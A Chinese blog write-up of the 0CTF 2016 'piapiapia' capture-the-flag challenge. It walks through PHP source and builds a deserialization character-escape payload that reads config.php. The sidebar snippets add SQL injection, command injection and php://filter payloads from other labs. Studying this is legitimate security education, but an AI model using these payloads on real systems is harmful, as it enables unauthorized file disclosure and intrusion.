[WP/BUU] [0CTF 2016]piapiapia

最新推荐文章于 2022-01-15 21:59:41 发布
最新推荐文章于 2022-01-15 21:59:41 发布
阅读量218 收藏
点赞数
分类专栏: # 凌晨四点起床刷题 # Web安全 文章标签: 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/darknotes/article/details/120742006
版权

www.zip可下载源码

审计源码

config.php

暗示flag在本文件

<?php
	$config['hostname'] = '127.0.0.1';
	$config['username'] = 'root';
	$config['password'] = '';
	$config['database'] = '';
	$flag = '';
?>
register.php

注册逻辑

<?php
	require_once('class.php');
	if($_POST['username'] && $_POST['password']) {
		$username = $_POST['username'];
		$password = $_POST['password'];

		if(strlen($username) < 3 or strlen($username) > 16) 
			die('Invalid user name');

		if(strlen($password) < 3 or strlen($password) > 16) 
			die('Invalid password');
		if(!$user->is_exists($username)) {
			$user->register($username, $password);
			echo 'Register OK!<a href="index.php">Please Login</a>';		
		}
		else {
			die('User name Already Exists');
		}
	}
	else {
profile.php

part1

存在反序列化,对photo进行替换可读任意文件。

<?php
   require_once('class.php');
   if($_SESSION['username'] == null) {
      die('Login First');    
   }
   $username = $_SESSION['username'];
   $profile=$user->show_profile($username);
   if($profile  == null) {
      header('Location: update.php');
   }
   else {
       // 反序列化入口,条件为已经设置个人信息,头像部分存在读文件危险函数
      $profile = unserialize($profile);
      $phone = $profile['phone'];
      $email = $profile['email'];
      $nickname = $profile['nickname'];
      $photo = base64_encode(file_get_contents($profile['photo']));
?>

part2

后端传回的BASE64形式图片会显示在此处。

<!DOCTYPE html>
<html>
<head>
   <title>Profile</title>
   <link href="static/bootstrap.min.css" rel="stylesheet">
   <script src="static/jquery.min.js"></script>
   <script src="static/bootstrap.min.js"></script>
</head>
<body>
	<div class="container" style="margin-top:100px">  
        
		<img src="data:image/gif;base64,<?php echo $photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;">
        
		<h3>Hi <?php echo $nickname;?></h3>
		<label>Phone: <?php echo $phone;?></label>
		<label>Email: <?php echo $email;?></label>
	</div>
</body>
</html>
<?php
	}
?>
update.php
	if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
		
		$username = $_SESSION['username'];
		if(!preg_match('/^\d{11}$/', $_POST['phone']))
			die('Invalid phone');
		
		if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
			die('Invalid email');
		
        // 长度限制,但可以加[]绕过
		if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');
		
        // 除大小无其他过滤
		$file = $_FILES['photo'];
		if($file['size'] < 5 or $file['size'] > 1000000)
			die('Photo size error');
		
        // photo存入头像路径
        // 1.路径字符长度确定,存在字符逃逸风险
        // 2.file['name']若可知,路径可知,文件名可控,猜测可写入木马,权限足够则可进行利用
		move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);
		// 序列化入口和数据库储存函数调用
		$user->update_profile($username, serialize($profile));
		echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
	}
class.php

part1

class user extends mysql{
	private $table = 'users';

	public function show_profile($username) {\
        // 存在过滤,关键字update被过滤,无法通过更新,修改photo路径
		$username = parent::filter($username);

		// 存在字符替换,利用此方法可以进行字符逃逸反序列化
		$where = "username = '$username'";
		$object = parent::select($this->table, $where);
		return $object->profile;
	}
	public function update_profile($username, $new_profile) {
		$username = parent::filter($username);
		$new_profile = parent::filter($new_profile);

		$where = "username = '$username'";
		return parent::update($this->table, 'profile', $new_profile, $where);
	}
}

part2

class mysql {
	private $link = null;
	// 
	public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		// 字符替换,条件:只有where字符串会产生一位的增加
		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}
}

攻击

字符逃逸POC
register.php 注册
-> update.php 填写信息,抓包修改带有where的字符串,构造字符逃逸,读取指定文件
-> profile.php 对序列化字符串进行解析,显示数据

尝试构造相应字符串以便观察

$profile['phone'] = '13232132123';
$profile['email'] = '123213131@qq.com';
$profile['nickname'] = array('123');
$profile['photo'] = 'config.php';
$a = serialize($profile);
echo $a;

a:4:{s:5:"phone";s:11:"13232132123";s:5:"email";s:16:"123213131@qq.com";s:8:"nickname";a:1:{i:0;s:3:"123";}s:5:"photo";s:10:"config.php";}
// 需要进行逃逸的部分
";}s:5:"photo";s:10:"config.php";}

根据路径构造替换文本

<?php
$profile['phone'] = '13232132123';
$profile['email'] = '123213131@qq.com';
$profile['nickname'] = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}';
$profile['photo'] = 'upload/' . md5('1');
$a = serialize($profile);

$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
echo preg_replace($safe, 'hacker', $a);

最终payload,在update.php抓包

使用构造数组nickname[]进行绕过长度限制

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

访问profile.php,查看源码
请添加图片描述

車鈊
关注
专栏目录
apachecn#apachecn-ctf-wiki#[WPBUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
BUUCTF:[BJDCTF2020]ZJCTF,不过如此 && 攻防世界web之ics-05 -- -preg_replace + /e 的任意代码执行漏洞
Zero_Adam的博客
02-13 384
不足: 在文件包含那里卡住了,想着flag.php还是next.php10多分钟后才想到可以用filter协议来读么,,,等一会看看能不能用data协议来读去??? 这个可以的:index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php 看到正则+str_replace,+ e 修正符,想到的是RCE!?!!。 知识点:/e模式的preg_repl
[BUUCTF] Web(一)
Manuffer的博客
10-08 496
BUUCTF web(一)
buuctf-web-[极客大挑战 2019]HardSQL-wp
居上
08-09 302
[极客大挑战 2019]HardSQL 知识点 绕过一些简单的过滤 right() 过程 主页是一个登陆页面 过滤了关键字 and、=、空格、union等 查库 check.php?username=admin'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=21 查表 check.php?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat
Buuctf -web wp汇总(二)
Alexhirchi的博客
06-27 2460
文章目录[ASIS 2019]Unicorn shop[网鼎杯 2020 青龙组]AreUSerialz [ASIS 2019]Unicorn shop 要点:Unicode安全设计 题目要求,当我们买下商品4,获得flag(买其他商品会提示,商品错误),但它只允许输入一个字符,而商品4要求价格为1337.0 。这里利用的就是Unicode的设计漏洞问题,该网站是UTF-8编码。给一个Unicode>1337的值就可以获得flag,可以通过网站获取一些特殊字符ↂ(查询thousand关键字) 参考链
BUUCTF:[SWPU2019]Web4
末初的CSDN博客
03-30 2798
[SWPU2019]Web4 参考:https://www.anquanke.com/post/id/194640#h3-4 题目只有一个登录框,输入账号密码后点击登陆页面无任何相应,注册功能也是尚未开放。查看源代码可以看到一个js文件,F12也可以看到一个网络请求。 js主要功能是将username和password以json格式然后发给index.php?r=Login/Login。 不难发...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
最新发布
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
buuctf-web-[极客大挑战 2019]Knife-wp
居上
06-28 194
[极客大挑战 2019]Knife 知识点 蚁剑或者中国菜刀等工具的使用 过程 主页: 直接给出这个主页就是一句话木马 蚁剑连接,根目录查看到flag
BUUCTF平台web writeup
a370793934的专栏
11-28 1587
[HCTF 2018]WarmUp 首先f12查看源码,发现一个hint: 于是访问source.php,得到审计的源代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) /* ...
BUUCTF-Web-随便注-wp
single7_的博客
12-14 398
0x01 知识点 SQL注入-堆叠注入 sql预处理语句 巧用contact()函数绕过 0x02 知识铺垫 在SQL中,分号(;)是用来表示一条sql语句的结束。在分号(;)结束一个sql语句后继续构造下一条语句,而后根据结果判断两条甚至多条SQL语句会不会一起执行?这种注入方式称为堆叠注入。 union injection(联合注入)是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语
NEWSCTF第一届--官方wp(2021新春赛)
qq_55400494的博客
06-02 4578
题目源码及部分wp汇总如下 链接:https://pan.baidu.com/s/1RIatd5BdmHgckwZ4w_Gcog 提取码:news Web
[ACTF2020 新生赛]Include
pakho_C的博客
01-15 1217
web 第八题 [ACTF2020 新生赛]Include 打开靶场 点击tips 通过url发现进行了文件读取,读取的文件为flag.php,结合题目思考这可能是一个文件包含的漏洞,并且flag就在flag.php中,此时需要进行读取文件内容 由于我是小白,对此类题没接触过(其实大多数都没接触过呜呜呜),经过一番搜索,只有wp解题了,就当知识积累 文件包含漏洞+PHP的伪协议 谈一谈php://filter的妙用 php://filter的理解: 引用于 php://filter 的使用 首先使用输
BUUCTF web [BJDCTF2020]EasySearch wp
Whaocai的博客
08-02 351
考点 ①ssi注入 进去之后是一个登录框,猜测有没有register.php,经过测试也不存在sql注入。直接御剑扫描(扫buuctf上的题要调线程和超时,我是线程10超时15,不然会被平台禁掉)。扫出来了index.php.swp index.php.swp源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$
buuctf-WEB-[护网杯 2018]easy_tornado
qq_42728977的博客
12-01 955
目录考点环境思路思考参考 考点 模板注入 环境 思路 观察get参数,需要文件名和filehash 杂谈hint.txt里面发现filehash的函数 需要爆出cookie_secret,cookie_secret简单说就是服务端验证用户端cookie安全性的一个值,也就是说不在本地。 看WP说这个特征是模板注入。 所以思路就是用模板注入获得cookie_secret,根据WP,cookie_secret在当前页面的setting里面,application初始化时存放在该对象的settings属性
[0CTF 2016]piapiapia WP(详细)
qq_43622442的博客
04-25 4442
[0CTF 2016]piapiapia WP(详细) 1.打开网站,是个登录框,尝试注入无果.....按道理来说就是注入了啊喂 2.玄学时间到:::       目录扫完啥结果没有。在buuctf做题总是这样,御剑线程开1,不管有没有压缩文件,统统扫不到- -但是可以扫出来普通的php文件,dirsearch要加延迟和调线程,不然...
buuctf-web-[GXYCTF2019]Ping Ping Ping-wp
居上
06-28 228
[GXYCTF2019]Ping Ping Ping 知识点 变量拼接 sh,bash下编码 绕过空格过滤 绕过关键字过滤 过程 主页: ?ip=127.0.0.1 ?ip=127.0.0.1;ls ?ip=127.0.0.1;cat flag.php 过滤了空格,使用$IFS$1来绕过 ?ip=127.0.0.1;cat$IFS$1flag.php 过滤了flag,但是可以查看下index.php ?ip=127.0.0.1;cat$IFS$1index.php |
buu ctf web进阶]ssti
08-23
- *1* *2* *3* [(wp)ctfweb-buu中ssti模板注入](https://blog.csdn.net/qq_51862722/article/details/118685275)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值